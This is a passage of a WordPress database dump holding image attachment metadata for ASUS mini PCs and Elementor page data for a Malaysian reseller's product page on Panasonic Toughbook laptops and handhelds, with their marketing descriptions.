:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"MB169B-1-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545232937\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3194,2568,'_wp_attached_file','2018/12/ASUS-Chromebox-3.jpg'),(3195,2568,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2018/12/ASUS-Chromebox-3.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"ASUS-Chromebox-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"ASUS-Chromebox-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"ASUS-Chromebox-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"ASUS-Chromebox-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"ASUS-Chromebox-3-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"ASUS-Chromebox-3-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3215,2577,'_wp_attached_file','2018/12/Mini-PC-PB60.jpg'),(3216,2577,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:499;s:6:\"height\";i:193;s:4:\"file\";s:24:\"2018/12/Mini-PC-PB60.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB60-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB60-300x116.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB60-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB60-480x193.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Mini-PC-PB60-20x8.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:8;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545236487\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3217,1442,'_yoast_wpseo_focuskw','ASUS'),(3198,2570,'_wp_attached_file','2018/12/Mini-PC-PB40.jpg'),(3199,2570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2018/12/Mini-PC-PB40.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB40-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB40-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB40-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Mini-PC-PB40-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Mini-PC-PB40-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3204,2573,'_wp_attached_file','2018/12/VivoMini-UN65U.jpg'),(3205,2573,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2018/12/VivoMini-UN65U.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN65U-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN65U-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN65U-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN65U-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN65U-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"VivoMini-UN65U-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3202,2572,'_wp_attached_file','2018/12/MINI-PC-PN60.jpg'),(3203,2572,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2018/12/MINI-PC-PN60.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"MINI-PC-PN60-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"MINI-PC-PN60-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"MINI-PC-PN60-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"MINI-PC-PN60-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"MINI-PC-PN60-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"MINI-PC-PN60-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3206,2574,'_wp_attached_file','2018/12/VivoMini-UN68U.jpg'),(3207,2574,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2018/12/VivoMini-UN68U.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN68U-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN68U-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN68U-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN68U-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"VivoMini-UN68U-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"VivoMini-UN68U-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3208,2575,'_wp_attached_file','2018/12/VivoMini-VC65-C.jpg'),(3209,2575,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2018/12/VivoMini-VC65-C.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"VivoMini-VC65-C-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"VivoMini-VC65-C-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"VivoMini-VC65-C-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"VivoMini-VC65-C-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"VivoMini-VC65-C-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"VivoMini-VC65-C-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3210,2576,'_wp_attached_file','2018/12/VivoMini-VC65-C1.jpg'),(3211,2576,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2018/12/VivoMini-VC65-C1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"VivoMini-VC65-C1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"VivoMini-VC65-C1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"VivoMini-VC65-C1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"VivoMini-VC65-C1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"VivoMini-VC65-C1-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"VivoMini-VC65-C1-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3212,1530,'_yoast_wpseo_focuskw','IBM Malaysia'),(3213,1530,'_yoast_wpseo_metadesc','IBM reseller software and hardware (server)'),(3214,1530,'_yoast_wpseo_linkdex','62'),(3218,1442,'_yoast_wpseo_metadesc','ASUS makes products in almost every area of Information Technology including PC components, peripherals, notebooks, tablets, servers and smartphones.'),(3219,1442,'_yoast_wpseo_linkdex','86'),(3222,2580,'_elementor_edit_mode','builder'),(3223,2580,'_elementor_template_type','post'),(3224,2580,'_edit_lock','1545357396:1'),(3225,2580,'_wp_page_template','template-fullwidth.php'),(3226,2580,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\"><strong>PRODUCT<\\/strong> DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":52},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":51},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":53},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 